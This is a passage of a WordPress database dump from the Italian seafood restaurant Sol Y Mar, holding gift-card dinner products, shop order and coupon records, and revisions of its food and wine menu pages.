saltati con patate e bacon\r\nGamberi alla greca\r\nSpaghetto alle vongole\r\nFrittura mista e lo spiedone grigliato\r\nSorbetto\r\nEuro 93,00 (Escluso Bavande)</em>','publish','closed','closed','','regala-cena-menu-storico-per-2-persone','','','2019-07-16 21:11:27','2019-07-16 19:11:27','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=474',0,'product','',0),(475,1,'2017-07-13 09:31:47','2017-07-13 07:31:47','Acquista e regala un coupon regalo da 50 euro','Gift Card 50 euro','Acquista e regala un coupon regalo','publish','closed','closed','','gift-card-50','','','2021-01-29 13:55:04','2021-01-29 12:55:04','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=475',0,'product','',0),(4608,0,'2021-01-31 16:22:40','2021-01-31 15:22:40','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Child Theme Configurator (da versione 2.5.7 a 2.5.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente','','','2021-01-31 16:22:40','2021-01-31 15:22:40','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente/',0,'postman_sent_mail','',0),(476,1,'2017-07-13 09:38:55','2017-07-13 07:38:55','Acquista un buono regalo per una cena: scegli il tuo menù, compila i campi e ricevi il coupon per un pranzo particolare al Sol Y Mar. Puoi scegliere se stampare il coupon e consegnarlo di persona alla fortunata persona, oppure farlo inviare direttamente via email.\r\n\r\n[product_category category=\"regala-cena\"]','Regala Cena','','publish','closed','closed','','regala-cena','','','2017-07-13 09:38:55','2017-07-13 07:38:55','',0,'http://www.ristorantesolymar.it/?page_id=476',0,'page','',0),(477,1,'2017-07-13 09:38:55','2017-07-13 07:38:55','Acquista un buono regalo per una cena: scegli il tuo menù, compila i campi e ricevi il coupon per un pranzo particolare al Sol Y Mar. Puoi scegliere se stampare il coupon e consegnarlo di persona alla fortunata persona, oppure farlo inviare direttamente via email.\r\n\r\n[product_category category=\"regala-cena\"]','Regala Cena','','inherit','closed','closed','','476-revision-v1','','','2017-07-13 09:38:55','2017-07-13 07:38:55','',476,'http://www.ristorantesolymar.it/2017/07/13/476-revision-v1/',0,'revision','',0),(482,1,'2017-07-16 08:55:20','2017-07-16 06:55:20','<em>Benvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\nEuro 98,00 (Escluso Bavande)</em>','Acquista Pranzo/Cena: Menù creativo per 2 persone','<em>Benvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\nEuro 98,00 (Escluso Bavande)</em>','draft','closed','closed','','acquista-pranzocena-menu-creativo-2-persone','','','2017-12-13 20:50:10','2017-12-13 19:50:10','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=482',0,'product','',0),(483,1,'2017-07-16 08:55:39','2017-07-16 06:55:39','<em>Benvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\n+ 1 bottiglia di vino \r\n+ 2 caffe’ \r\n+ 1 bottiglia d’acqua\r\nEuro 120</em>','Acquista Pranzo/Cena: Menù creativo per 2 persone + Bevande','<em>Benvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\n+ 1 bottiglia di vino \r\n+ 2 caffe’ \r\n+ 1 bottiglia d’acqua\r\nEuro 120</em>','draft','closed','closed','','acquista-pranzocena-menu-creativo-2-persone-bevande','','','2017-12-13 20:50:10','2017-12-13 19:50:10','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=483',0,'product','',0),(484,1,'2017-07-16 08:57:02','2017-07-16 06:57:02','<em>Calamari saltati con patate e bacon\r\nGamberi alla greca\r\nSpaghetto alle vongole\r\nFrittura mista e lo spiedone grigliato\r\nSorbetto\r\nEuro 90,00 (Escluso Bavande)</em>','Acquista Pranzo/Cena: Menù storico per 2 persone','<em>Calamari saltati con patate e bacon\r\nGamberi alla greca\r\nSpaghetto alle vongole\r\nFrittura mista e lo spiedone grigliato\r\nSorbetto\r\nEuro 90,00 (Escluso Bavande)</em>','draft','closed','closed','','acquista-pranzocena-menu-storico-per-2-persone','','','2017-12-13 20:50:10','2017-12-13 19:50:10','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=484',0,'product','',0),(485,1,'2017-07-16 08:58:40','2017-07-16 06:58:40','<em>Calamari saltati con patate e bacon\r\nGamberi alla greca\r\nSpaghetto alle vongole\r\nFrittura mista e lo spiedone grigliato\r\nSorbetto\r\n1 bottiglia di vino \r\n2 caffè\r\n1 bottiglia d’acqua\r\nEuro 115</em>','Acquista Pranzo/Cena: Menù storico per 2 persone + Bevande','<em>Calamari saltati con patate e bacon\r\nGamberi alla greca\r\nSpaghetto alle vongole\r\nFrittura mista e lo spiedone grigliato\r\nSorbetto\r\n1 bottiglia di vino \r\n2 caffè\r\n1 bottiglia d’acqua\r\nEuro 115</em>','draft','closed','closed','','acquista-pranzocena-menu-storico-per-2-persone-con-bevande','','','2017-12-13 20:50:10','2017-12-13 19:50:10','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=485',0,'product','',0),(486,1,'2017-07-16 09:04:07','2017-07-16 07:04:07','Acquista il tuo pranzo o la tua cena online: il Sol Y Mar ti propone questi menù per 2 persone. Scegli il tuo menù, compila i campi e concludi l\'acquisto del buono. Se invece vuoi regalare un buono a qualcuno, allora vai alla sezione <a href=\"http://www.ristorantesolymar.it/regala-cena/\">\"regala cena\"</a>\r\n\r\n[product_category category=\"acquista-cena\"]','Acquista Cena','','inherit','closed','closed','','36-revision-v1','','','2017-07-16 09:04:07','2017-07-16 07:04:07','',36,'http://www.ristorantesolymar.it/2017/07/16/36-revision-v1/',0,'revision','',0),(487,1,'2017-07-27 16:23:34','2017-07-27 14:23:34','','Order &ndash; luglio 27, 2017 @ 04:23 PM','','wc-completed','open','closed','order_5979f7661582d','ordine-jul-27-2017-0223-pm','','','2017-07-27 16:25:35','2017-07-27 14:25:35','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=487',0,'shop_order','',3),(488,0,'2017-07-27 16:25:26','2017-07-27 14:25:26','GIFTCARD ORDER #487','solymarcouponPJSFP','GIFTCARD ORDER #487','publish','closed','closed','','solymarcouponpjsfp','','','2017-07-27 16:25:26','2017-07-27 14:25:26','',0,'http://www.ristorantesolymar.it/2017/07/27/solymarcouponpjsfp/',0,'shop_coupon','',0),(489,1,'2017-07-31 11:06:28','2017-07-31 09:06:28','','Order &ndash; luglio 31, 2017 @ 11:06 AM','','wc-cancelled','open','closed','order_597ef3147b529','ordine-jul-31-2017-0906-am','','','2017-07-31 11:38:14','2017-07-31 09:38:14','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=489',0,'shop_order','',1),(490,1,'2017-07-31 11:14:24','2017-07-31 09:14:24','','Order &ndash; luglio 31, 2017 @ 11:14 AM','','wc-processing','open','closed','order_597ef4f0616c1','ordine-jul-31-2017-0914-am','','','2017-07-31 11:16:57','2017-07-31 09:16:57','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=490',0,'shop_order','',2),(491,0,'2017-07-31 11:16:59','2017-07-31 09:16:59','GIFTCARD ORDER #490','solymarcouponIMWA4','GIFTCARD ORDER #490','publish','closed','closed','','solymarcouponimwa4','','','2017-07-31 11:16:59','2017-07-31 09:16:59','',0,'http://www.ristorantesolymar.it/2017/07/31/solymarcouponimwa4/',0,'shop_coupon','',0),(492,1,'2017-08-11 21:44:55','2017-08-11 19:44:55','','Order &ndash; agosto 11, 2017 @ 09:44 PM','','wc-completed','open','closed','order_598e0937ba5a3','ordine-aug-11-2017-0744-pm','','','2017-08-11 21:50:17','2017-08-11 19:50:17','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=492',0,'shop_order','',3),(493,0,'2017-08-11 21:49:03','2017-08-11 19:49:03','GIFTCARD ORDER #492','solymarcouponK4YIT','GIFTCARD ORDER #492','publish','closed','closed','','solymarcouponk4yit','','','2017-08-11 21:49:03','2017-08-11 19:49:03','',0,'http://www.ristorantesolymar.it/2017/08/11/solymarcouponk4yit/',0,'shop_coupon','',0),(494,1,'2017-08-30 09:37:54','2017-08-30 07:37:54','','Order &ndash; agosto 30, 2017 @ 09:37 AM','','wc-completed','open','closed','order_59a66b52735a7','ordine-aug-30-2017-0737-am','','','2017-08-30 09:41:55','2017-08-30 07:41:55','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=494',0,'shop_order','',3),(495,0,'2017-08-30 09:39:36','2017-08-30 07:39:36','GIFTCARD ORDER #494','solymarcouponJV0HE','GIFTCARD ORDER #494','publish','closed','closed','','solymarcouponjv0he','','','2017-08-30 09:39:36','2017-08-30 07:39:36','',0,'http://www.ristorantesolymar.it/2017/08/30/solymarcouponjv0he/',0,'shop_coupon','',0),(496,1,'2017-10-11 09:58:59','2017-10-11 07:58:59','','Order &ndash; ottobre 11, 2017 @ 09:58 AM','','wc-completed','open','closed','order_59ddcf4313c9a','ordine-oct-11-2017-0758-am','','','2017-10-11 10:02:39','2017-10-11 08:02:39','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=496',0,'shop_order','',3),(497,0,'2017-10-11 10:01:23','2017-10-11 08:01:23','GIFTCARD ORDER #496','solymarcouponTHCO0','GIFTCARD ORDER #496','publish','closed','closed','','solymarcouponthco0','','','2017-10-11 10:01:23','2017-10-11 08:01:23','',0,'http://www.ristorantesolymar.it/2017/10/11/solymarcouponthco0/',0,'shop_coupon','',0),(499,2,'2017-11-02 20:37:42','2017-11-02 19:37:42','<em>Il Crudo</em>\r\n\r\n<em>La tartare di mazzancolle su crumble di nocciole e foie gras con confettura di tropea</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em>La tavolozza di crudità</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tartare di tonno con  pistacchi, melanzane, pomodori arrostiti e squacquerone</em>\r\n\r\n<em>€12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La tartare di orata con zenzero e mela verde</em>\r\n\r\n<em>€12,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il carpaccio di ricciola alla mediterranea </em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le fettuccine di spigola alla carbonara </em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le ostriche secondo la carta del giorno</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli scampi nostrani crudi</em>\r\n\r\n<em>€ 8,00 all’etto( min. 2 etti)</em>\r\n\r\n<em> </em>\r\n\r\n<em>Lo spaghetto “SUSHI”</em>\r\n\r\n<em>(spaghetto artigianale condito a freddo con il nostro pesce crudo)</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Mise en place,il nostro pane fatto in casa ,piccola entrée di Benvenuto </em>\r\n\r\n<em>€ 3,00</em>\r\n\r\n<em>Il pesce destinato ad essere consumato crudo o praticamente crudo è stato sottoposto a </em>\r\n\r\n<em>trattamento di bonifica preventiva conforme alle prescrizioni del regolamento (CE)835/2004</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>','Pesce Crudo','','inherit','closed','closed','','49-revision-v1','','','2017-11-02 20:37:42','2017-11-02 19:37:42','',49,'http://www.ristorantesolymar.it/2017/11/02/49-revision-v1/',0,'revision','',0),(500,2,'2017-11-02 20:45:01','2017-11-02 19:45:01','<em>Il Pesce</em>\r\n\r\n<em>(Secondi Piatti )</em>\r\n\r\n<em>Il tataki di ricciola alla soia con macedonia di frutta e verdura e cremoso di avocado</em>\r\n\r\n<em>€18,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le mazzancolle nostrane alla griglia con pinzimonio di verdure </em>\r\n\r\n<em>€ 22,oo     </em>\r\n\r\n<em> </em>\r\n\r\n<em>Il filetto di rombo chiodato ai profumi mediterranei su schiacciata di patate e maionese di polipo (120/140 gr)</em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il filetto di ombrina al profumo di limone,crema di cozze ,dragoncello e julienne di zucchine </em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le scaloppe di pescatrice alla parmigiana, con melanzana passita, pomodoro confit e spuma di bufala (120/140gr)</em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La nostra catalana tiepida di astice e mazzancolle nostrane</em>\r\n\r\n<em>€ 22,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La frittura mista con verdurine croccanti</em>\r\n\r\n<em>€ 22,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La mezza porzione di frittura con verdurine croccanti</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Lo spiedone di pesce grigliato e insalatina mista al balsamico</em>\r\n\r\n<em>(la nostra grigliata per pigri)</em>\r\n\r\n<em>€ 19,00</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Per chi non mangia pesce </em>\r\n\r\n<em> </em>\r\n\r\n<em>L’ hamburger di soia (vegano)       € 9,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il cannolo croccante di pasta filo e verdure al curry     € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le crocchette dorate alle verdure (vegano)         € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Lo scortichino di seitan e tofu con verdure croccanti al balsamico (vegano)       € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>La fritturina di verdure (vegano)         € 11,00</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>','Il Pesce','','inherit','closed','closed','','108-revision-v1','','','2017-11-02 20:45:01','2017-11-02 19:45:01','',108,'http://www.ristorantesolymar.it/2017/11/02/108-revision-v1/',0,'revision','',0),(501,2,'2017-11-02 20:49:58','2017-11-02 19:49:58','<em>La Pasta</em>\r\n\r\n<em>Gli spaghettini del “ Pastificio dei Campi di Gragnano Igp “ con ostriche ,burro dolce e mela verde </em>\r\n\r\n<em>€14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>I passatelli con mazzancolle, melanzane, menta e pomodorini freschi profumati all’ arancio </em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le linguine del “ Pastificio Mancini” con crema di peperoni dolci,</em>\r\n\r\n<em>tonno affumicato e bottarga fatti da noi </em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>I gnocchetti di patate con alici affumicate, olive taggiasche,pomodorini e spuma di squaquerone</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>I tortelli ripieni di patate e stracciatella di bufala con ragù di astice ,pomodorini e basilico</em>\r\n\r\n<em>€ 16,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le linguine del “Pastificio Mancini” al bianco di ombrina ,pistacchi ,capperi e limone </em>\r\n\r\n<em>€14,00 </em>\r\n\r\n<em> </em>\r\n\r\n<em>Il risotto “ Carnaroli Acquerello “ tradizionale alla marinara *Min. 2 porz. – tempo di cottura 30’</em>\r\n\r\n<em>€ 14,oo a porzione</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Bis di primi piatti *esclusi risotto e tortelli all’astice *min. 2 porz</em>\r\n\r\n<em>€ 15,oo a porzione</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> Per i vegetariani e vegani </em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli spaghettini del Pastificio dei Campi di Gragnano al pesto di pistacchi ,capperi e limone </em>\r\n\r\n<em>€ 11,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli strozzapreti con ragù di seitan (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le linguine del “Pastificio Mancini” alla carbonara (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> Secondo legge N. art 145 .Nel nostro ristorante possono essere utilizzati prodotti surgelati all’origine(Gamberi e Calamari)tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>\r\n\r\n&nbsp;','La Pasta','','inherit','closed','closed','','51-revision-v1','','','2017-11-02 20:49:58','2017-11-02 19:49:58','',51,'http://www.ristorantesolymar.it/2017/11/02/51-revision-v1/',0,'revision','',0),(502,2,'2017-11-02 20:51:25','2017-11-02 19:51:25','<em>Gli antipasti </em>\r\n\r\n<em> </em>\r\n\r\n<em>La piccola degustazione di antipasti, un crudo e due cotti secondo mercato</em>\r\n\r\n<em>(Min. 2 porzioni)</em>\r\n\r\n<em>€ 19,0oo cad.</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le tagliatelle di seppia cotte a bassa temperatura“Allo scoglio”, con frutti di mare e crostacei</em>\r\n\r\n<em>(Servita a temperatura ambiente)</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli straccetti di mazzola con spinaci scottati , ricotta salata e pinoli al burro e salvia </em>\r\n\r\n<em>€ 13,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il paglia e fieno di calamari,fagiolini profumato alla curcuma </em>\r\n\r\n<em>€ 13,00 </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Le piadine fritte ripiene di sardoncini grigliati, radicchio ,cipolla di tropea e squacquerone</em>\r\n\r\n<em>€ 11,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il club sandwich di sgombro con mucchino di San Patrignano, zucchine grigliate e pomodoro</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli storici   </em>\r\n\r\n<em> </em>\r\n\r\n<em>L’ antipasto misto freddo ,secondo pescato </em>\r\n\r\n<em>€ 13 ,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>I gamberi alla greca (gli Originali dal 1994)</em>\r\n\r\n<em>con pomodoro fresco e formaggio fuso</em>\r\n\r\n<em>€ 15,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Per chi non mangia pesce</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il pinzimonio di verdure (vegano)</em>\r\n\r\n<em>€ 7,oo</em>\r\n\r\n<em>L’ insalatina aromatica alla frutta (vegano)</em>\r\n\r\n<em>€ 9,00</em>\r\n\r\n<em>La julienne di zucchine marinate con i pinoli (vegano)</em>\r\n\r\n<em>€ 8,oo</em>\r\n\r\n<em>La parmigiana di melanzane</em>\r\n\r\n<em>€ 10,0o</em>\r\n\r\n<em> </em>\r\n\r\n<em>In questo ristorante possono essere utilizzati prodotti surgelati all’origine(nella fattispecie di gamberi e calamari) tuttavia è nostro scrupolo selezionare, anche in questo caso, sempre</em> <em>la qualità migliore</em>','Antipasti Cotti','','inherit','closed','closed','','47-revision-v1','','','2017-11-02 20:51:25','2017-11-02 19:51:25','',47,'http://www.ristorantesolymar.it/2017/11/02/47-revision-v1/',0,'revision','',0),(503,2,'2020-07-21 20:04:04','2020-07-21 18:04:04','<strong><em>Le dolcezze</em></strong>\n\n&nbsp;\n\n<em>“Il Parfait al croccantino e spuma  zabaione”                                        € 7,00                </em>\n\n<em> </em>\n\n<em> </em><em>“Crema Catalana 2.0”                                                                                 € 7,00</em>\n\n<em>  </em>\n\n<em>  “Pina Colada”                                                                                               € 7,00                                                                                      </em>\n\n<em> </em><em>“ Tocca l\'Albicocca ”                                                                                    </em>\n\n<em>  </em>\n\n<em> Il tortino al cioccolato con cuore fondente, gelato al caramello salato (tempo di cott. 15min)    € 8,00</em>\n\n&nbsp;\n\n<em>La frutta fresca</em>\n\n<em>Ananas                                                                                                                     € 5,oo</em>','I Dolci','','inherit','closed','closed','','54-autosave-v1','','','2020-07-21 20:04:04','2020-07-21 18:04:04','',54,'http://www.ristorantesolymar.it/2017/11/02/54-autosave-v1/',0,'revision','',0),(504,2,'2017-11-02 21:08:17','2017-11-02 20:08:17','<em> Le dolcezze</em>\r\n\r\n<em> </em>\r\n\r\n<em>“Pina Colada”                                                                                                        € 7,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>“Ancora un’altra zuppa Inglese? “                                                                    € 7,00                </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>“Al contadino non far sapere”                                                                             € 7,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>“A spasso per la Sicilia “                                                                                        € 7,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>“Pere,lampone e cioccolato”(gluten free –vegano)                                        € 7,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>La crema catalana                                                                                                € 5,50</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il parfait al croccantino e spuma di zabaione                                                  € 6,50</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Il tortino al cioccolato con cuore fondente, </em>\r\n\r\n<em>gelato al caramello salato (tempo di cott. 15min)                                          € 8,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Il semifreddo al Mascarpone (gelateria Snoopy)                                             € 6,50</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> Il sorbetto al caffè                                                                                                 € 4,00</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Per i più Piccoli</em>\r\n\r\n<em> </em>\r\n\r\n<em>Coppetta panna e cacao                                                                                      € 2,50</em>\r\n\r\n<em> </em>\r\n\r\n<em>La frutta fresca</em>\r\n\r\n<em>Ananas                                                                                                                     € 5,oo</em>','I Dolci','','inherit','closed','closed','','54-revision-v1','','','2017-11-02 21:08:17','2017-11-02 20:08:17','',54,'http://www.ristorantesolymar.it/2017/11/02/54-revision-v1/',0,'revision','',0),(505,2,'2017-11-02 21:13:09','2017-11-02 20:13:09','<em>Per i piccoli ospiti…</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<strong><em>Menù Spiderman &amp; Principesse”</em></strong>\r\n\r\n<em>Gnocchetti al Ragù o pomodoro </em>\r\n\r\n<em>Cotoletta con patate fritte</em>\r\n\r\n<em>Gelato € 20 </em>\r\n\r\n<strong><em>Menù “Capitan Uncino”</em></strong>\r\n\r\n<em>Gnocchetti di patate alle vongole</em>\r\n\r\n<em>Sogliola alla griglia patate fritte</em>\r\n\r\n<em>Gelato€ 22,00 </em>\r\n\r\n<strong><em>Menù “Peter Pan “</em></strong>\r\n\r\n<em>Tortellini alla panna o al ragù</em>\r\n\r\n<em>Bistecchina di entrecote con patate fritte</em>\r\n\r\n<em>Gelato€ 22,00 </em>\r\n\r\n<em>I menù sono acquistabili solo per i piccoli ospiti(non per gli adulti)</em>\r\n\r\n<em> </em>\r\n\r\n<strong><em>Alla carta</em></strong>\r\n\r\n<strong><em>Primi piatti</em></strong>\r\n\r\n<em>Gnocchi al pomodoro                                                                                                          € 9,oo</em>\r\n\r\n<em>Gnocchi al ragù                                                                                                                   € 10,oo</em>\r\n\r\n<em>Gnocchi alle vongole                                                                                                         € 11,oo</em>\r\n\r\n<em>Spaghetti alle vongole                                                                                                      €13,oo</em>\r\n\r\n<em>Tortellini alla panna                                                                                                            € 10,oo</em>\r\n\r\n<em>Tortellini al ragù                                                                                                                € 10,oo</em>\r\n\r\n<strong><em>Secondi piatti</em></strong>\r\n\r\n<em>Cotoletta con patate fritte                                                                                                 € 13,oo</em>\r\n\r\n<em>Sogliola alla griglia con patate fritte                                                                               € 14,00</em>\r\n\r\n<em>Bistecchina di entrcote con patate fritte                                                                     € 14,00</em>\r\n\r\n<em>Carote a filino                                                                                                                   € 4,00</em>\r\n\r\n<em>Coperto bimbi                                                                                                                 € 2,oo</em>\r\n\r\n<em> </em>','Menù Bambini','','inherit','closed','closed','','14-revision-v1','','','2017-11-02 21:13:09','2017-11-02 20:13:09','',14,'http://www.ristorantesolymar.it/2017/11/02/14-revision-v1/',0,'revision','',0),(507,2,'2017-11-02 21:15:50','2017-11-02 20:15:50','<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong>   I blanc de blancs</strong>\r\n\r\n<strong> </strong>\r\n\r\nWranken/Pommery     Diamant Brut B.D.B. Reims                                  € 45,00\r\n\r\n<strong> </strong>\r\n\r\nAgrapart &amp; fils           Terroirs Ex. Brut Grand Cru Avize                    € 70,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nUlysse Collin                       Les Pierrieres Extra Brut rm Congy                        € 90,00\r\n\r\nLes Roises Extra Brut rm Congy                           € 88,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPascal Doquet                       Brut   Diapason     Mesnil sur Oger                            € 60,00\r\n\r\nBrut grand cru  Mesnil sur Oger                               € 85,00\r\n\r\n&nbsp;\r\n\r\nBonnet Gilmert        Cuvee de reserve Brut Grand cruc 0,375               € 21,00\r\n\r\nCuvee de reserve Brut Grand Cru Oger                 € 40,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPierre Gimonnet        Cuvee 1er cru brut Cuis                                          € 42,00\r\n\r\n&nbsp;\r\n\r\nDavid Léclapart          L’artiste pas dose 1er cru (biod.) Trépail                       € 105,00\r\n\r\n&nbsp;\r\n\r\nR &amp; L Legras              Brut Grand Crù Chouilly                                       € 50,00\r\n\r\nSaint Vincent Grand cru Mill Chouilly                  €120,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPierre Péters              Le Chétillons cuvee special Brut Mesnil s.O.         € 72,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nJacques Selosse        Initial Grand Cru Brut Avize                                      € 130,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDiebolt Vallois           Brut Mill   Cramant                           “10                   € 55,00\r\n\r\nFleur de Passion Brut Cramant         “07                  € 95,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\nVouette &amp; Sorbée      Blanc d’Argile Extra Brut Buxieres sur Arce              € 80,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPAG. 06','Francia Champagne','','inherit','closed','closed','','75-revision-v1','','','2017-11-02 21:15:50','2017-11-02 20:15:50','',75,'http://www.ristorantesolymar.it/2017/11/02/75-revision-v1/',0,'revision','',0),(508,2,'2020-10-24 23:09:28','2020-10-24 21:09:28','<p style=\"text-align: center\"><strong>Franciacorta</strong></p>\n<p style=\"text-align: left\"><strong>     </strong>Faccoli                                    Brut D.O.C.G                                                                            € 30,00</p>\n<p style=\"text-align: left\">     Majolini<strong>                    </strong>Satèn millesimato D.O.C.G                                                      € 30,00</p>\n<p style=\"text-align: left\">     Monterossa               P.R. Brut blanc de blancs                                                    € 32,00</p>\n<p style=\"text-align: left\">      Cabochon Brut millesimo                                                      € 65,00</p>\n<p style=\"text-align: left\">      Il Mosnel                    Extra Brut millesimato D.O.C.G                                              € 38,00</p>\n<p style=\"text-align: left\">                                     Pas dosè D.O.C.G                                                                               € 27,00</p>\n<p style=\"text-align: left\">       Villa                          Brut rosé millesimato D.O.C.G                                               € 32,00</p>\n<p style=\"text-align: left\">                                    Saten millesimato D.O.C.G                                                       € 30,00</p>\n&nbsp;\n\n&nbsp;\n\n<strong><u> </u></strong>\n\n<strong><u> </u></strong>\n\n<strong><u> </u></strong>\n\n<strong><u>  </u></strong>\n\n<strong><u>Sud Africa</u></strong>\n\n<strong><u> </u></strong>\n\nPongracz                   Metodo classico brut da chardonnay e pinot nero                     € 28,00\n\n<strong><u> </u></strong>','Franciacorta','','inherit','closed','closed','','77-autosave-v1','','','2020-10-24 23:09:28','2020-10-24 21:09:28','',77,'http://www.ristorantesolymar.it/2017/11/02/77-autosave-v1/',0,'revision','',0),(509,2,'2017-11-02 21:18:49','2017-11-02 20:18:49','<strong>   I blanc de noir</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPol Cochet                 Pol Cochet Brut                                                               € 33,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nBereche et fils       Rive Gauche ext. Brut 100% meunier Mareuil-le-port     € 65,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nNathalie Falmet     Le Val Cornet brut Rouvres les Vignes                               € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nFleury Pere &amp; Fils Brut nm (biologico) Courteron                                           € 50,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nEgly-Ouriet     “Les Vignes de Vrigny”Brut 1er cru 